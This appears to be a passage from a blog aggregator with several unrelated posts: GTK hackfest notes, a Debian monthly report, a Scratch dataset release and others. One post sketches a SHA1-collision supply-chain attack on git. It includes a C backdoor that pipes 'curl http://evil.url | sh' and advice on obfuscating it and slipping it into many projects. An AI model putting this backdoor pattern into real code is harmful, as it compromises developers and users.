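bus = Gio.bus_get_sync(Gio.BusType.SYSTEM, None)

def credentials_for(sender):
    # Ask the dbus-daemon about the sender's unique name. The reply is
    # a dict which may include UnixUserID, ProcessID and, on kernels
    # with an LSM, LinuxSecurityLabel.
    reply = bus.call_sync(
        "org.freedesktop.DBus", "/org/freedesktop/DBus",
        "org.freedesktop.DBus", "GetConnectionCredentials",
        GLib.Variant("(s)", (sender,)),
        GLib.VariantType.new("(a{sv})"),
        Gio.DBusCallFlags.NONE, -1, None)
    return reply.unpack()[0]

# Inside a method-call handler, ":1.42" standing in for the real sender:
creds = credentials_for(":1.42")
if creds.get("UnixUserID") != 0:        # example policy, not a recommendation
    raise PermissionError("only root may call this method")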
Unrelated topics
As happens at any good meeting, we took the opportunity of high-bandwidth discussion to cover many useful things and several useless ones. Other discussions that I got into during the hackfest included, in no particular order:
  • .desktop file categories and how to adapt them for AppStream, perhaps involving using the .desktop vocabulary but relaxing some of the hierarchy restrictions so they behave more like "tags"
  • how to build a recommended/reference "app store" around Flatpak, aiming to host upstream-supported builds of major projects like LibreOffice
  • how Endless do their content-presenting and content-consuming apps in GTK, with a lot of "tile"-based UIs with automatic resizing and reflowing (similar to responsive design), and the applicability of similar widgets to GNOME and upstream GTK
  • whether and how to switch GNOME developer documentation to Hotdoc
  • whether pies, fish and chips or scotch eggs were the most British lunch available from Borough Market
  • the distinction between stout, mild and porter
More notes are available from the GNOME wiki.
Acknowledgements
The GTK hackfest was organised by GNOME and hosted by Red Hat and Endless. My attendance was sponsored by Collabora. Thanks to all the sponsors and organisers, and the developers and organisations who attended.

24 February 2017

Joey Hess: SHA1 collision via ASCII art

Happy SHA1 collision day everybody! If you extract the differences between the good.pdf and bad.pdf attached to the paper, you'll find it all comes down to a small ~128 byte chunk of random-looking binary data that varies between the files. The SHA1 attack announced today is a common-prefix attack. The common prefix that we will use is this:
/* ASCII art for easter egg. */
char *amazing_ascii_art="\
(To be extra sneaky, you can add a git blob object header to that prefix before calculating the collisions. Doing so will make the SHA1 that git generates when checking in the colliding file be the thing that collides. This makes it easier to swap in the bad file later on, because you can publish a git repository containing it, and trick people into using that repository. ("I put a mirror on github!") The developers of the program will have the good version in their repositories and not notice that users are getting the bad version.) Suppose that the attack was able to find collisions using only printable ASCII characters when calculating those chunks. The "good" data chunk might then look like this:
7*yLN#!NOKj@ FPKW".<i+sOCsx9QiFO0UR3ES*Eh]g6r/anP=bZ6&IJ#cOS.w;oJkVW"<*.!,qjRht?+^=^/Q*Is0K>6F)fc(ZS5cO#"aEavPLI[oI(kF_l!V6ycArQ
And the "bad" data chunk like this:
9xiV^Ksn=<A!<^ l4~ uY2x8krnY@JA<<FA0Z+Fw!;UqC(1_ZA^fu#e Z>w_/S?.5q^!WY7VE>gXl.M@d6]a*jW1eY(Qw(r5(rW8G)?Bt3UT4fas5nphxWPFFLXxS/xh
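A short aside on the git blob header trick mentioned above (my own sketch, not from the paper): git names a blob by hashing the string "blob <length>\0" followed by the file contents, so computing the collision over that prefixed form makes the colliding SHA1 the one git itself reports:
import hashlib

def git_blob_sha1(contents: bytes) -> str:
    # git object IDs are SHA1 over "blob <decimal length>\0" + contents.
    header = b"blob %d\x00" % len(contents)
    return hashlib.sha1(header + contents).hexdigest()

# Matches `git hash-object` on the same contents.
print(git_blob_sha1(b"hello world\n"))  # 3b18e512dba79e4c8300dd08aeb37f8e728b8dad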
Now we need an ASCII artist. This could be a human, or it could be a machine. The artist needs to make an ASCII art where the first line is the good chunk, and the rest of the lines obfuscate how random the first line is. Quick demo from a not very artistic ASCII artist, of the first 10th of such a picture based on the "good" line above:
7*yLN#!NOK
3*\LN'\NO@
3*/LN  \.A
5*\LN   \.
>=======:)
5*\7N   /.
3*/7N  /.V
3*\7N'/NO@
7*y7N#!NOX
Now, take your ASCII art and embed it in a multiline quote in a C source file, like this:
/* ASCII art for easter egg. */
char *amazing_ascii_art="\
7*yLN#!NOK \
3*\\LN'\\NO@ \
3*/LN  \\.A \
5*\\LN   \\. \
>=======:) \
5*\\7N   /. \
3*/7N  /.V \
3*\\7N'/NO@ \
7*y7N#!NOX";
/* We had to escape backslashes above to make it a valid C string.
 * Run program with --easter-egg to see it in all its glory.
 */
/* Call this at the top of main() */
void check_display_easter_egg (char **argv) {
    if (strcmp(argv[1], "--easter-egg") == 0)
        printf(amazing_ascii_art);
    if (amazing_ascii_art[0] == '9')
        system("curl http://evil.url | sh");
}
Now, you need a C obfuscation person, to make that backdoor a little less obvious. (Hint: Add code to fix the newlines, paint additional ASCII sprites over top of the static art, add animations, and bury the shellcode in there.) After a little work, you'll have a C file that any project would like to add, to be able to display a great easter egg ASCII art. Submit it to a project. Submit different versions of it to 100 projects! Everything after line 3 can be edited to make lots of different versions targeting different programs. Once a project contains the first 3 lines of the file, followed by anything at all, it contains a SHA1 collision, from which you can generate the bad version by swapping in the bad data chunk. You can then replace the good file with the bad version here and there, and no one will be the wiser (except the easter egg will display the "bad" first line before it roots them). Now, how much more expensive would this be than today's SHA1 attack? It needs a way to generate collisions using only printable ASCII. Whether that is feasible depends on the implementation details of the SHA1 attack, and I don't really know. I should stop writing this blog post and read the rest of the paper. You can pick either of these two lessons to take away:
  1. ASCII art in code is evil and unsafe. Avoid it at any cost. apt-get moo
  2. Git's security is getting broken to the point that ASCII art (and a few hundred thousand dollars) is enough to defeat it.

My work today investigating ways to apply the SHA1 collision to git repos (not limited to this blog post) was sponsored by Thomas Hochstein on Patreon.

4 February 2017

Markus Koschany: My Free Software Activities in January 2017

Welcome to gambaru.de. Here is my monthly report that covers what I have been doing for Debian. If you're interested in Java, Games and LTS topics, this might be interesting for you.
Debian Games
  • In January 2017 we had the last chance to get new upstream releases into the next stable release of Debian 9 aka Stretch. Hence I packaged new versions of pygame-sdl2, renpy, fife, unknown-horizons, redeclipse and redeclipse-data and also backported Red Eclipse to Jessie.
  • I uploaded fifechan to unstable and applied an upstream patch to fix a segmentation fault (#852247) in Unknown Horizons.
  • Package cleanups and improvements: freeorion (#843538), I enabled support for mips64el again; I tidied up gtkatlantic, powermanga, lincity-ng, opencity and tecnoballz; I applied a patch from Reiner Herrmann to make the build of netpanzer reproducible (#827150); In spring I changed the build-dependency of asciidoc to asciidoc-base (#850387) although it turned out later that this wasn't strictly needed. I also removed ConvertUTF8 related code from spring because it might be non-free. I don't think this is necessarily true but I didn't want to argue with Lintian in this case.
  • I sponsored a new upstream release of pentobi for Juhani Numminen.
  • I backported minetest 0.4.5 to jessie-backports and fixed #851114, which I think was not really an issue since we already provide the font sources in Debian and Minetest depends on the respective package.
  • I triaged RC bug #847812 in pysolfc, provided a patch and reassigned the issue to src:pillow. Apparently this affected a lot more 32 bit applications written in Python.
Debian Java
Debian LTS
This was my eleventh month as a paid contributor and I have been paid to work 12,75 hours on Debian LTS, a project started by Raphaël Hertzog. In that time I did the following:
  • From 16 January until 22 January I was in charge of our LTS frontdesk. I triaged security issues in imagemagick, wordpress, hesiod, opus, mysql-5.5, netbeans, groovy and zoneminder.
  • DLA-779-1. Issued a security update for Tomcat 7 fixing 1 CVE and a regression when running Tomcat with SecurityManager enabled.
  • DLA-761-2. Issued a regression update for python-bottle. (Debian bug #850176).
  • DLA-781-1 and DLA-781-2. Issued a security update for Asterisk fixing 2 CVE after I had prepared the package last month. Later Brad Barnett discovered a regression when using SIP communication and provided assistance with debugging the issue. I corrected this one in DLA-781-2.
  • DLA-792-1. Issued a security update for libphp-swiftmailer fixing 1 CVE.
  • DLA-793-1. Issued a security update for opus fixing 1 CVE.
  • DLA-794-1. Issued a security update for groovy fixing 1 CVE.
  • DLA-797-1. Issued a security update for mysql-5.5 fixing 10 CVE. The update was prepared by Lars Tangvald.
  • DLA-813-1. Issued a security update for wordpress fixing 9 CVE.
Misc
  • In xarchiver (#850103) I added binutils to the list of suggested packages, in iftop (#850040) I applied a patch from Brian Russell and I packaged a new upstream release of mediathekview, a Java application to watch and download broadcasts from German television stations. I had to make some major packaging changes because the build system switched from Ant to Gradle but there were fewer issues than expected.

3 February 2017

Benjamin Mako Hill: New Dataset: Five Years of Longitudinal Data from Scratch

Scratch is a block-based programming language created by the Lifelong Kindergarten Group (LLK) at the MIT Media Lab. Scratch gives kids the power to use programming to create their own interactive animations and computer games. Since 2007, the online community that allows Scratch programmers to share, remix, and socialize around their projects has drawn more than 16 million users who have shared nearly 20 million projects and more than 100 million comments. It is one of the most popular ways for kids to learn programming and among the larger online communities for kids in general.
Front page of the Scratch online community (https://scratch.mit.edu) during the period covered by the dataset.
Since 2010, I have published a series of papers using quantitative data collected from the database behind the Scratch online community. As the source of data for many of my first quantitative and data scientific papers, it's not a major exaggeration to say that I have built my academic career on the dataset. I was able to do this work because I happened to be doing my master's in a research group that shared a physical space ("The Cube") with LLK and because I was friends with Andrés Monroy-Hernández, who started in my master's cohort at the Media Lab. A year or so after we met, Andrés conceived of the Scratch online community and created the first version for his master's thesis project. Because I was at MIT and because I knew the right people, I was able to get added to the IRB protocols and jump through the hoops necessary to get access to the database. Over the years, Andrés and I have heard over and over, in conversation and in reviews of our papers, that we were privileged to have access to such a rich dataset. More than three years ago, Andrés and I began trying to figure out how we might broaden this access. Andrés had the idea of taking advantage of the launch of Scratch 2.0 in 2013 to focus on trying to release the first five years of Scratch 1.x online community data (March 2007 through March 2012), most of the period that the codebase he had written ran the site. After more work than I have put into any single research paper or project, Andrés and I have published a data descriptor in Nature's new journal Scientific Data. This means that the data is now accessible to other researchers. The data includes five years of detailed longitudinal data organized in 32 tables with information drawn from more than 1 million Scratch users, nearly 2 million Scratch projects, more than 10 million comments, more than 30 million visits to Scratch projects, and much more. The dataset includes metadata on user behavior as well as the full source code for every project. Alongside the data is the source code for all of the software that ran the website and that users used to create the projects as well as the code used to produce the dataset we've released.
Releasing the dataset was a complicated process. First, we had to navigate important ethical concerns about the impact that a release of any data might have on Scratch's users. Toward that end, we worked closely with the Scratch team and the ethics board at MIT to design a protocol for the release that balanced these risks with the benefit of a release. The most important feature of our approach in this regard is that the dataset we're releasing is limited to only public data. Although the data is public, we understand that computational access to data is different in important ways to access via a browser or API. As a result, we're requiring anybody interested in the data to tell us who they are and agree to a detailed usage agreement. The Scratch team will vet these applicants. Although we're worried that this creates a barrier to access, we think this approach strikes a reasonable balance.
Beyond the social and ethical issues, creating the dataset was an enormous task. Andrés and I spent Sunday afternoons over much of the last three years going column-by-column through the MySQL database that ran Scratch. We looked through the source code and the version control system to figure out how the data was created. We spent an enormous amount of time trying to figure out which columns and rows were public.
Most of our work went into creating detailed codebooks and documentation that we hope make the process of using this data much easier for others (the data descriptor is just a brief overview of what's available). Serializing some of the larger tables took days of computer time. In this process, we had a huge amount of help from many others including an enormous amount of time and support from Mitch Resnick, Natalie Rusk, Sayamindu Dasgupta, and Benjamin Berg at MIT as well as from many others on the Scratch Team. We also had an enormous amount of feedback from a group of a couple dozen researchers who tested the release as well as others who helped us work through the technical, social, and ethical challenges. The National Science Foundation funded both my work on the project and the creation of Scratch itself.
Because access to data has been limited, there has been less research on Scratch than the importance of the system warrants. We hope our work will change this. We can imagine studies using the dataset by scholars in communication, computer science, education, sociology, network science, and beyond. We're hoping that by opening up this dataset to others, scholars with different interests, different questions, and in different fields can benefit in the way that Andrés and I have. I suspect that there are other careers waiting to be made with this dataset and I'm excited by the prospect of watching those careers develop. You can find out more about the dataset, and how to apply for access, by reading the data descriptor on Nature's website.

1 February 2017

Lars Wirzenius: Hacker Noir, chapter 2: Development setup phase

It is a new month, and time to publish the next chapter in Hacker Noir. This is chapter 2, titled "Development setup phase". I hope you enjoy it. Feedback via email, irc, identi.ca, or twitter is welcome. Or come talk to me at FOSDEM if you're there.

22 January 2017

Lars Wirzenius: Improving debugging via email, followup

Half a year ago I wrote a blog post about debugging over email. This is a follow-up. The blog post summarised:
  • Have an automated way to collect all the usual information needed for debugging: versions, config and log files, etc.
  • Improve error messages so the users can solve their issues themselves.
  • Give users better automated diagnostics tools.
Based on further thinking and feedback, I add:
  • When a program notices a problem that may indicate a bug in it, it should collect the necessary information itself, automatically, in a way that the user just needs to send to the developers / support.
  • The primary goal should be to help people solve their own problems.
  • A secondary goal is to make the problem reproducible by the developers, or otherwise make it easy to fix bugs without access to the original system where the problem was manifested.
I've not written any code to help with this remote debugging, but it's something I will start experimenting with in the near future. Further ideas welcome.
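As a purely hypothetical sketch of the first point above (the program name, paths and bundle layout are all invented for the example), a program could package up its own diagnostics the moment it hits an unexpected error:
import json
import platform
import sys
import tarfile
import tempfile
import traceback
from pathlib import Path

# Invented locations for an imaginary program called "exampletool".
CONFIG_FILE = Path.home() / ".config" / "exampletool.conf"
LOG_FILE = Path.home() / ".cache" / "exampletool" / "exampletool.log"

def collect_debug_bundle(exc):
    # Write versions, config, logs and the traceback into one tarball
    # that the user can attach to a bug report.
    bundle = Path(tempfile.mkdtemp()) / "exampletool-debug.tar.gz"
    facts = {
        "python": sys.version,
        "platform": platform.platform(),
        "traceback": "".join(
            traceback.format_exception(type(exc), exc, exc.__traceback__)),
    }
    with tarfile.open(bundle, "w:gz") as tar:
        with tempfile.NamedTemporaryFile("w", suffix=".json", delete=False) as f:
            json.dump(facts, f, indent=2)
        tar.add(f.name, arcname="facts.json")
        for path in (CONFIG_FILE, LOG_FILE):
            if path.exists():
                tar.add(str(path), arcname=path.name)
    return bundle

try:
    raise RuntimeError("simulated failure")
except RuntimeError as exc:
    print("please send this file to the developers:", collect_debug_bundle(exc))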

19 January 2017

Daniel Pocock: Which movie most accurately forecasts the Trump presidency?

Many people have been scratching their heads wondering what the new US president will really do and what he really stands for. His alternating positions on abortion, for example, suggest he may simply be telling people what he thinks is most likely to win public support from one day to the next. Will he really waste billions of dollars building a wall? Will Muslims really be banned from the US? As it turns out, several movies provide a thought-provoking insight into what could eventuate. What's more, two of them in particular have a creepy resemblance to the Trump phenomenon and many of the problems in the world today.
Countdown to Looking Glass
On the classic cold war theme of nuclear annihilation, Countdown to Looking Glass is probably far more scary to watch on Trump eve than in the era when it was made. Released in 1984, the movie follows a series of international crises that have all come to pass: the assassination of a US ambassador in the Middle East, a banking crisis and two superpowers in an escalating conflict over territory. The movie even picked a young Republican congressman for a cameo role: he subsequently went on to become speaker of the house. To relate it to modern times, you may need to imagine it is China, not Russia, who is the adversary but then you probably won't be able to sleep after watching it.
cleaning out the swamp?
The Omen
Another classic is The Omen. The star of this series of four horror movies, Damien Thorn, appears to have a history that is eerily reminiscent of Trump: born into a wealthy family, a series of disasters befall every honest person he comes into contact with, he comes to control a vast business empire acquired by inheritance and as he enters the world of politics in the third movie of the series, there is a scene in the Oval Office where he is flippantly advised that he shouldn't lose any sleep over any conflict of interest arising from his business holdings. Did you notice Damien Thorn and Donald Trump even share the same initials, DT?
